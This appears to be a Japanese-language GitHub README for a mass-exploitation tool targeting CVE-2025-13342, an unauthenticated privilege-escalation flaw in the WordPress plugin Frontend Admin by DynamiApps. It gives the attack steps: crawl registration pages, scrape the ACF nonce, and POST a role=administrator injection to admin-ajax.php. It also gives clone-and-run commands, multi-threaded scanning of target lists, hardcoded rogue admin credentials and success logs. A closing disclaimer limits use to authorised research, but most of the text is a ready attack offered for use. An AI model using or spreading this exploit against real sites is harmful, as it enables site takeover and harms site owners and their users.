
Frontend Admin by DynamiApps <= 3.28.20 - 未認証の任意オプション更新
| 項目 | 詳細 |
|---|---|
| CVE ID | CVE-2025-13342 |
| スコア | 9.8 CRITICAL(重大) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| 影響を受けるバージョン | Frontend Admin by DynamiApps ≤ 3.28.20 |
| 認証 | 不要 — 完全に未認証 |
| 種別 | 不十分な権限チェック+入力検証 → 任意オプション書き込み |
| CWE | CWE-284 · 不適切なアクセス制御 |
何が起こるか:
ActionOptions::run() の保存ハンドラは、wp_options への書き込み前にユーザー権限のチェックも入力検証も行いません。公開された ACF フロントエンドフォームがオープンな書き込みチャネルになります。攻撃者は users_can_register=1 と default_role=administrator を設定し、新しいアカウントを登録すると、自動的に Administrator ロールが付与されます。
このツールは、その2段階のアプローチをスキップします — acff[user][field_*] を介してユーザー作成フィールドに role=administrator を注入した細工済みフォームペイロードを直接送信し、1回の AJAX 呼び出しで管理者アカウントを作成します。
1. Crawl common registration paths → locate ACF frontend form
2. Parse hidden fields → _acf_nonce, _acf_form
3. Map user fields → username · email · password · role
4. POST /wp-admin/admin-ajax.php
action=frontend_admin/form_submit
acff[user][<role_field>] = administrator
5. {"success":true} → admin account created
6. Log to acf_success.txt
requests
beautifulsoup4
colorama
rich
pip install requests beautifulsoup4 colorama rich
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py
このツールは対話式です。次の4つの質問が表示されます:
Targets file path → list.txt
Threads → 10
Timeout (seconds) → 10
Verbose debug → y / N
認証情報は内部的に固定されています:
| 項目 | 値 |
|---|---|
| ユーザー名 | Nxadmin1 |
| メールアドレス | [email protected] |
| パスワード | NxAdmin_1337#KSA |
1行に1ホスト — スキームは任意:
https://target1.com
target2.com
http://target3.com
このツールはターゲットごとに 28個のパス を順に調べ、最初に見つかった有効な ACF フォームで停止します:
/ /register/ /registration/ /signup/ /sign-up/
/user-registration/ /account/ /my-account/
/frontend-form/ /frontend-register/ ...
| ファイル | 内容 |
|---|---|
acf_success.txt | 管理者作成の成功が確認された記録 |
形式:
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 [email protected] PASS=NxAdmin_1337#KSA JSON={"success":true,...}
端末出力:
[+] Target base: https://target.com
[+] Found form at: https://target.com/register/
_acf_nonce: a1b2c3d4e5
_acf_form: 123
[+] SUCCESS: https://target.com
[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com
| 作成者 | Nxploited (Khaled Alenazi) |
| GitHub | github.com/Nxploited |
| Telegram | @KNxploited |
このツールは許可されたセキュリティ研究および教育目的のみで提供されます。
作成者は、所有者からの明示的な書面による許可なしにシステムに対して使用された場合の一切の責任を負いません。
未許可のアクセスは、CFAA、CMA、および世界各国の同等の法律に基づき違法です。
あなた自身の行動に対する責任はすべてあなたにあります。